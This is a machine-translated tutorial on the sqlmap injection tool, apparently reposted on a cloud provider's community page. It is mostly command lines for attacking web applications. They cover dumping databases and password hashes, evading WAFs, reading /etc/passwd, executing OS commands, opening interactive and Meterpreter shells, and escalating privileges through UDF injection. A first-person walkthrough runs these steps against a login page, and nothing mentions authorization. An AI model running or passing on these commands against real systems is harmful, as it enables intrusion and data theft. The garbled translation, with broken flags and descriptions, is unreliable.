Sqlmap How to use

Source: Internet
Author: User
Tags auth http authentication http cookie parse error
1. Basic usage:
./sqlmap.py -u "Inject address" -v 1 --dbs // List the database
./sqlmap.py -u "Inject address" -v 1 –current-db // current database
./sqlmap.py -u "Inject address" -v 1 –users // Column database users
./sqlmap.py -u "inject address" -v 1 –current-user // current user
./sqlmap.py -u "Injection address" -v 1 -tables -D "Database" // List the table names of the database
./sqlmap.py -u "Injection address" -v 1 -columns -T "Table name" -D "Database" // Get column name of table
./sqlmap.py -u "Injection address" -v 1 -dump -C "Field, field" -T "Table name" -D "Database" // Get data in the table, including columns
The database has been dragged. SQLMAP is very user-friendly. It stores the acquired data in sqlmap / output /
2.sqlmap post injection
When we use Sqlmap for post injection,
It is often the case that a missed request results in an injection failure.
Share a little trick here, that is, use burpsuite to use sqlmap,
Post injection testing in this way will be more accurate and easy to operate.
1. The browser opens the target address http: // www.2cto.com/Login.asp
2. Configure Burp proxy ( to intercept requests
3. Click the submit button of the login form
4. As shown below, at this time Burp will intercept our login POST request
5. Copy this post request as txt, I named it search-test.txt and put it in the sqlmap directory
6. Run sqlmap and use the following command:
./sqlmap.py -r search-test.txt -p tfUPass
The parameter -r is to make sqlmap load our post request rsearch-test.txt,
And -p everyone should be familiar with specifying the parameters for injection.
3, sqlmap cookies injection
sqlmap.py -u “” –cookies “id = 1 ″ –dbs –level 2
2. By default, SQLMAP only supports injection test of GET / POST parameters, but when using the –level parameter and the value is greater than or equal to 2, the cookie parameters are also checked. When> = 3, User-agent and Referer, then this is very simple, we directly add -level 2 on top of the original
Use sqlmap cookies injection to break through user login and continue injection
First get the user's login cookie,
Add a link cookies property to favorites:
Take your own name
javascript: alert (document.cookie), when you need to get the current cookie,
Click this link directly, and then copy the pop-up dialog
The cookie value is set.
sqlmap.py -u http: //x.x.x.x/Down.aspx? tid = 2 -p tid –dbms mssql –cookie = ”info = username = test”
-p refers to the specified parameter injection
4.sqlmap encountered url rewrite injection
* Wherever there is an injection
./sqlmap.py -u "http://www.cunlide.com/id1/1*/id2/2"
5.sqlmap encoding around waf injection
./sqlmap.py -u -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
There are many space2morehash.py encoding scripts loaded in the tamper directory of sqlmap.
Other foundations:
sqlmap -u “http: // url / news? id = 1” –level = 3 –smart –dbms “Mysql” –current-user #Get the current user name
sqlmap -u “http://www.xxoo.com/news?id=1” –level = 3 –smart –dbms “Mysql” –current-db #Get the current database name
sqlmap -u “http://www.xxoo.com/news?id=1” –level = 3 –smart –dbms “Mysql” –tables -D “db_name” #List name
sqlmap -u “http: // url / news? id = 1” –level = 3 –smart –dbms “Mysql” –columns -T “tablename” users-D “db_name” -v 0 #Column field
sqlmap -u “http: // url / news? id = 1” –level = 3 –smart –dbms “Mysql” –dump -C “column_name” -T “table_name” -D “db_name” -v 0 #Get field content
******************Access to information******************
sqlmap -u “–smart –dbms“ Mysql ”–users #Column database user sqlmap -u“ –smart –dbms “Mysql” –dbs # column database sqlmap -u “–smart –dbms“ Mysql ”–passwords #Database user password sqlmap -u "--smart -dbms" Mysql "-passwords-U root -v 0 #List the specified user database passwords sqlmap -u" --smart -dbms "Mysql" -dump-all -v 0 #List all databases Table
sqlmap -u “–smart –dbms“ Mysql ”–privileges #View permissions sqlmap -u“ –smart –dbms “Mysql” –privileges -U root #View specified user permissions sqlmap -u “–smart –dbms“ Mysql ”–is -dba -v 1 #Whether it is a database administrator sqlmap -u "–smart -dbms" Mysql "-roles #Enumerate database user roles sqlmap -u" --smart -dbms "Mysql" -udf-inject #Import user-defined Functions (get system permissions!)
sqlmap -u "–smart -dbms" Mysql "-dump-all -exclude-sysdbs -v 0 #List all tables in the current library
sqlmap -u “–smart –dbms“ Mysql ”–union-check # Whether to support union injection sqlmap -u“ –smart –dbms “Mysql” –union-cols #union Query table records sqlmap -u “–smart –dbms“ Mysql ”--Union-test #union statement test
sqlmap -u “–smart –dbms“ Mysql ”–union-use –banner #injection using union sqlmap -u“ –smart –dbms “Mysql” –union-test –union-tech orderby #union cooperate with order by
sqlmap -u “–smart –dbms“ Mysql ”–method“ POST ”— data“ id = 1 & cat = 2 ″ #post injection sqlmap -u “–smart –dbms“ Mysql ”–cookie“ COOKIE_VALUE ”#cookie injection
sqlmap -u "–smart -dbms" Mysql "-b #Get banner information
sqlmap -u “http: // url / news? id = 1” –level = 3 –smart-v 1 -f #fingerprint identification database type
sqlmap -u “http: // url / news? id = 1” –level = 3 –smart–proxy ”” #Proxy injection
sqlmap -u "http: // url / news? id = 1" –string "STRING_ON_TRUE_PAGE" #Specify keywords
sqlmap -u "–smart -dbms" Mysql "-sql-shell #execute the specified sql command
sqlmap -u “–smart –dbms“ Mysql ”–file / etc / passwd sqlmap -u“ –smart –dbms “Mysql” –os-cmd = whoami #Execute the system command sqlmap -u “–smart –dbms“ Mysql ”– os-shell #system interactive shell sqlmap -u “–smart –dbms“ Mysql ”–os-pwn # rebound shell sqlmap -u“ –smart –dbms “Mysql” –reg-read # read win system registry sqlmap -u “–Smart –dbms“ Mysql ”–dbs-o“ sqlmap.log ”#Save progress sqlmap -u“ –smart –dbms “Mysql” –dbs -o “sqlmap.log” –resume #Restore saved progress
Different injection methods and different types, let's simple classification:
1.get type: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”
2.post type: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data = ”xxxx = xxxx & xxxx = xxx”
3. Cookie class injection: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie = ”xxx = xxx & xxx = xxx” –level = 2
OK, let ’s follow up
 Need a database: -dbs
To get the database name xxx, you need a table: -D xxx –tables
Get table name xxxx, need segment: -D xxx -T xxxx -columns
Get admin, password in the segment, the required values: -D xxx -T xxxx -C “admin, password” –dump
So let's understand what -D -T -C does, of course, knowing its name and specifying to use it.
What does --dbs --tables --columns do? Of course, you do n’t know the name, so list it.
--Dump That is literally, similar to the behavior of exporting data
 In fact, the injection has the above commands, which are adequate, but you still need to bypass waf -tamper = ”"
The injection was identified as a tool and disconnected --user-agent = ”"
No matter how many powerful functions are accumulated slowly, don't think about eating fat
Well, running the database is so simple, so here is a slightly dry example:
http://www.xxx.com/login.asp has post injection. I want to post it, but I don't want to go out and copy the post data. It is very troublesome. I want to let sqlmap run post injection automatically.
sqlmap -u “http://www.xxx.com/login.asp” –forms
Very good, the above command successfully ran post injection for me, and found the injection point of the post jjj = 123
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs
So I used the above command to look at the database
sqlmap -u "http: //
www.xxx.com/login.asp ”–forms -p jjj –is-dba
By the way, see if the current user is dba
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a
What can I get with the above command -a: go and see for yourself.
 To help you filter, those commands under -a are used to look at users, look at hosts, and look at permissions.
 Later, I found that the permissions are still quite high. At the same time, I ran out the database name kkk
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables
At the same time, I found the path to the website, and then I found the osmap -ox-xx series of sqlmap commands, which can execute system commands. I also found the xpcmdshell -os-shell
And a lot of superb file manipulation commands --file-xx. These commands can be used when they are needed, which will bring you unexpected surprises.
 At the same time, I found that the tables did n’t have what I wanted, and I could n’t find the right content. What to do, my heart was overwhelming, I decided to run out all the database content and find it myself, so I did:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all
Then the nimble sqlmap started to run, and then my egg broke. Nima, sqlmap will ask you if you want to crack the password once, whether this, or that, and my little friends I want to wipe your brother-in-law, I ’m doing my best, I saw a command again—batch can automatically select the default option of sqlmap
 So, I can play with my children and never have to look at sqlmap to drag the library.
In summary, the help documentation is still very important. If you look at it, there will always be some gains:
 In order to prevent you from seeing vomiting in English, the summary is as follows:
Target: Literally, target, then it is the target
Request: literally, request is the definition of the request content, such as post data, http headers, cookie injection, http header pollution, etc
Optimization: Literally, tuning performance, etc.
Injection: Literally, the settings for injection are basically here, such as specifying the injection point, db, the system, etc.
Basically, it is used to confirm the injection range and find the injection point area. These
Basically used to determine the injection method and attack method
Basically used in fingerprint recognition, rarely used
Enumeration information, mainly used in injection, is very important and very common
Brute force:
Used for blasting, in fact, it is mainly used to enumerate tables columns
User-defined function injection:
At present, only the UDF is used to raise the power, and to specify some of the sqlmap scripts that you define, for high-end use, for guidance
File system access
Mainly file reading, file writing
Operating system access
It is mainly used for system operations, such as os-shell and subsequent connection metasploit to implement penetration attacks.
windows registry access
Basically the registry operation
Literally, comprehensive content, some special function implementations, I found these very useful parameters in the crawl batch here
Visual inspection of high-end applications, not yet used, ask God for advice
 As summarized above, probably the scarlet letter is a commonly used command, and the rest of the less commonly used ones are also very good. In special cases, the content is applicable.
There are a lot of words, and novice friends who want to see it will have some gains if they look carefully. If the novices have any other wonderful tricks, they also hope to share 1,2 and progress together! !!
SQLMAP Chinese description
-D Connect directly to the database
   -UURL-URL = URL target URL
    -L use Burp, WebScarab proxy log parsing target saved in specified text file
   -M BULKFILE scan multiple targets to enlist
   -R REQUESTFILE loads HTTP requests from a file
   -G read Google URL, legendary batch detection
   -C load options from config file configfile
   These options can be used to specify how to connect to the target URL.
    --data = DATA send data string via POST
    --cookie = COOKIE HTTP cookie header
    --cookie-urlencode URL-encoded cookie injection
    --drop-set-cookie ignore response from Set-Cookie header
    --user-agent = AGENT HTTP User-Agent header
    --random-agent Randomly selected HTTP User-Agent header
    --referer = REFERER HTTP Referer header
    --headers = HEADERS HTTP header newline separated
    --auth-type = ATYPE HTTP authentication type (basic, digest, or NTLM)
    --auth-cred = ACRED HTTP authentication credentials (username: password)
    --auth-cert = ACERT ACERT HTTP authentication certificate (key_file, cert_file)
    --proxy = PROXY HTTP proxy connects to the target URL
     --proxy-cred = PCRED HTTP proxy authentication credentials (username: password)
    --ignore-proxy ignore HTTP proxy
    --delay = DELAY delay between each HTTP request
    --timeout = TIMEOUT timeout waiting for connection (default 30)
    --retries = RETRIES Retry connection timeout (default 3)
    --scope = SCOPE regular expression to filter target to provide proxy logs
    --safe-url = SAFURL URL addresses are often tested during access tests
    --safe-freq = SAFREQ test requirements for a given secure URL between SAFREQ visits
   These options can be used to optimize the performance of SqlMap.
   -O Turn on all optimization switches
    --predict-output predict output common prediction output
    --keep-alive keep-alive using persistent HTTP (S) connections
    --null-connection Empty connection retrieval page has no actual HTTP response body length
    --threads = THREADS maximum number of concurrent HTTP (S) requests (default is 1)
   These options can be used to specify which parameter tests,
   Provides custom injection load and optional tamper script.
   -P TESTPARAMETER testable parameter (S)
    --dbms = DBMS specified database
    --os = OS specified operating system
    --prefix = PREFIX injection payload prefix string
    --suffix = SUFFIX injection payload suffix string
    --tamper = TAMPER tamper with injected data to use the given script (s)
   These options can be used to specify how pages are parsed and compared
   Use blind SQL injection techniques when responding from HTTP content.
    --level = LEVEL The level of the test to be performed (1-5, default is 1)
    --risk = RISK test execution risk (0-3, default is 1)
    --string = STRING string matching string is a valid page at query time
    --regexp = REGEXP regular expression matching is valid for page queries
    --text-only Plain text comparison based on text content only
   These options can be used to tune specific SQL injection tests
    --technique = TECH SQL injection technology test (default Boist)
    --time-sec = TIMESEC seconds delay in DBMS response (default is 5)
    --union-cols = UCOLS column range test
    --union-char = UCHAR number of columns with brute force cracking
   -f, --fingerprint fingerprint for extensive DBMS version fingerprinting
   These options can be used to list backend databases
   Information, structure and data contained in the management system
   table. In addition, you can run your own SQL statements.
   -b, --banner database banner
   --current-user database current user
   --current-db retrieve database current database
   --is-dba detect if the current DBMS user is a DBA
     --users enumerate users and DBMS users
    --passwords password enumerate DBMS user password hash
    --privileges Privileges enumerate the permissions of the database user
    --roles role enumerate the roles of database users
    --dbs enumerated DBMS database
    --tables DBMS database tables
    --columns DBMS database table columns
    --schema enumerate database schema
    --count retrieve the number of table entries
    --dump Dump DBMS database table entries
    --dump-all Dump all entries in the DBMS database table
    --search search column (S), table (S) and / or database name (S)
    -D DBMS database enumeration
    -T DBMS database table enumeration
    -C List of DBMS database tables
    -U user DBMS user enumeration
    --exclude-sysdbs DBMS system database
    --start = LIMITSTARTRetrieve the output of the first query
    --stop = LIMITSTOP retrieve the output of the last query
    --first = FIRSTCHAR First query output word character retrieval
    --last = LASTCHAR Character search for the output word of the last query
    --sql-query = QUERY
    --sql-shell prompt next interactive SQL shell
 Brute force:
   These options can be used to run brute force checks.
 User-defined function injection:
   These options can be used to create user-defined functions.
    --udf-inject Inject user-defined functions
    --shared-lib = SHLIB shared library for local path
 File system access:
   These options can be used to access back-end database management
   The underlying file system of the system.
    --file-read = RFILE Read file from DBMS file system
    --file-write = WFILE write a local file on the backend DBMS file system
    --file-dest = DFILE absolute file path write of back-end database
 Operating system access:
   These options can be used to access back-end database management
   The underlying operating system of the system.
    --os-cmd = OSCMD execute operating system commands
    --os-shell prompt interactive operating system shell
    --os-pwn prompt for a downright shell with meterpreter or VNC
     --os-smbrelay One click prompt an OOB shell, meterpreter or VNC
     --os-bof stored procedure buffer overflow exploitation
    --priv-esc database process "user privilege escalation
    --msf-path = MSFPATH local path Metasploit Framework etc. 3 installation
    --tmp-path = TMPPATH Remote absolute path temporary file directory
 Windows registry access:
   These options can be used to access back-end database management
   System Windows Registry.
    --reg-read Read Windows registry key values
    --reg-add write a Windows registry key value data
eg-delL delete Windows registry keys
    --reg-key = REGKEY Windows Registry
    --reg-value = REGVAL Windows registry key
    --reg-data = REGDATA Windows registry key value data
    --reg-type = REGTYPE Windows registry key value type
   These options can be used to set some general working parameters.
   -s save and restore retrieve all data in meeting files
   -t login to all HTTP traffic in a text file
   --batch batch never ask for user input, use default behavior
   --charset = CHARSET character encoding for data retrieval
   --eta shows estimated arrival time for each output
   --flush-session flush meeting session files
   --fresh-queries query results stored in conference files
   --save configure INI file save options
   --update updated SqlMap
    --beep SQL injection found
    --check-payload IDS detection test to check the payload
    --cleanup Clean up DBMS for SqlMap specific UDFs and tables
     --forms Parse and test the target URL of the form
     --gpage = GOOGLEPAGE dork results from the specified page number using Google
    --mobile via HTTP User-Agent header
    --page-rank Display page rank (PR) for Google dork results
    --parse-errors Parse error messages from DBMS response pages
    --replicate Copy data into a SQLite3 database
    --tor uses the default Tor (Vidalia / Privoxy / Polipo can be) proxy address
    --wizard wizard simple wizard interface for beginner users

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.